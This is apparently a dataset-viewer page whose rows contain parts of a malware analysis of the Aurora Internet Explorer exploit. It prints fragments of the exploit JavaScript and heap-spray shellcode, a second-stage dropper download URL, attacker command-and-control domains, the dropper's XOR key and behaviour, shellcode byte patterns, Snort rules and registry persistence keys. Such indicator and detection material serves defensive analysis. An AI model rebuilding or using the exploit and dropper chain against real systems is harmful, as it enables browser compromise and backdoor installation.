text
stringlengths 4
429
|
---|
x1 [i].data = "abc"; |
var e1 = null; |
function ev1 (evt) |
e1 = document.createEventObject (evt); |
document.getElementById ("sp1").innerHTML = ""; |
window.setInterval (ev2, 50); |
function ev2 () |
"\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u |
0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0 |
d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; |
for (i = 0; i < x1.length; i ++) { |
x1 [i].data = p; |
var t = e1.srcElement; |
</script> |
</head> |
<body> |
<span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)" width="16" height="16"></span> |
</body> |
</html> |
JavaScript Artifacts |
Initial encrypted dropper download. |
Decrypted dropper. |
Pattern |
Deleted file. |
C:\%appdata%\a.exe |
Deleted file. |
C:\%appdata\b.exe |
JavaScript present in Internet Explorer memory space. |
<code listed above> |
Download URL present in internet history during memory |
analysis. |
Other domains associated with Aurora. |
http://demo1.ftpaccess.cc/demo/ad.jpg |
sl1.homelinux.org |
360.homeunix.com |
ftp2.homeunix.com |
update.ourhobby.com |
blog1.servebeer.com |
The shellcode exists as a Unicode escaped variable (sc) in the malicious JavaScript listed below. Upon successful |
exploitation of Internet Explorer, the shellcode will download an obfuscated second stage executable from |
http://demo1.ftpaccess.cc/demo/ad.jpg which is the dropper. Note: these files are specific to the sample we analyzed at |
HBGary, Inc. The attackers must use a second stage download mechanism to achieve full system access due to memory |
constraints. It is unlikely that the final payload could be delivered through the original exploit given these conditions. |
The dropper is XOR encrypted with a 0x95 key. The shellcode copies this encrypted binary to the user |
s AppData |
directory as |
a.exe |
. The shellcode then decrypts |
a.exe |
and moves it to |
b.exe |
in the same directory. Then |
b.exe |
executed. The following actionable intelligence can be used to identify exploit remnants in the heap space of Internet |
Explorer post exploitation attempt. These patterns can be searched for when doing memory analysis of a victim system. |
Shellcode Artifacts |
Pattern |
Self-decrypting code using a constant XOR value. |
80 34 0B D8 80 34 0B D8 |
Kernel32.dll searching code. |
64 A1 30 00 00 00 8B 40 0C 8B 70 1C |
Push Urlmon string to stack using two push statements. |
68 6F 6E 00 00 68 75 72 6C 6D |
The following SNORT rules have been released by the Emerging Threats project to detected the final payload command |
and control communications. |
Network Detection Signatures |
alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:"ET TROJAN Aurora Backdoor (C&C) client connection to CnC"; |
flow:established,to_server; content:"|ff ff ff ff ff ff 00 00 fe ff ff ff ff ff ff ff ff ff 88 ff|"; depth:20; |
flowbits:set,ET.aurora.init; classtype:trojan-activity; reference:url,www.trustedsource.org/blog/373/An-Insightinto-the-Aurora-Communication-Protocol; reference:url,doc.emergingthreats.net/2010695; |
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Aurora; sid:2010695; rev:2;) |
alert tcp $EXTERNAL_NET 443 -> $HOME_NET any (msg:"ET TROJAN Aurora Backdoor (C&C) connection CnC response"; |
flowbits:isset,ET.aurora.init; flow:established,from_server; content:"|cc cc cc cc cd cc cc cc cd cc cc cc cc cc |
cc cc|"; depth:16; classtype:trojan-activity; reference:url,www.trustedsource.org/blog/373/An-Insight-into-theAurora-Communication-Protocol; reference:url,doc.emergingthreats.net/2010696; |
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Aurora; sid:2010696; rev:2;) |
D RO PPE R |
The initial dropper is merely a detonation package that decompresses an embedded DLL into the Windows system32 |
directory and loads it as a service. The initial dropper is likely to be packed (UPX, etc). The dropper has an embedded |
DLL that is decompressed to the windows system32 directory. This DLL will be named to resemble existing services |
(rasmon.dll, etc). In order to evade forensics, the file-time of the dropped DLL will be modified to match that of an |
existing system DLL (user32.dll, etc). The dropped DLL is loaded into its own svchost.exe process. Several |
registry keys are created and then deleted as part of this process. Finally, the dropper deletes itself from the system by |
using a dissolving batch file (DFS.BAT, etc). |
Actionable Intelligence |
Pattern |
Service Key & Value |
Note: deleted after drop |
Path to backdoor |
Note: deleted after stage 1 |
Path to backdoor |
Note: persistent |
Potential variation |
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\ |
Value: SysIns Data: Ups??? (??? are three random chars) |
SYSTEM\CurrentControlSet\Services\Ups???\Parameters\ |
Value: ServiceDLL Data: (full path to the backdoor) |
SYSTEM\CurrentControlSet\Services\RaS???\Parameters\ |
Value: ServiceDLL Data: (full path to the backdoor) |
SYSTEM\CurrentControlSet\Services\RaS???\Parameters\ |
Value: ServiceDLL Data: %temp%\c_####.nls (where #### is a number) |
SYSTEM\CurrentControlSet\Services\RaS???\Parameters\ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.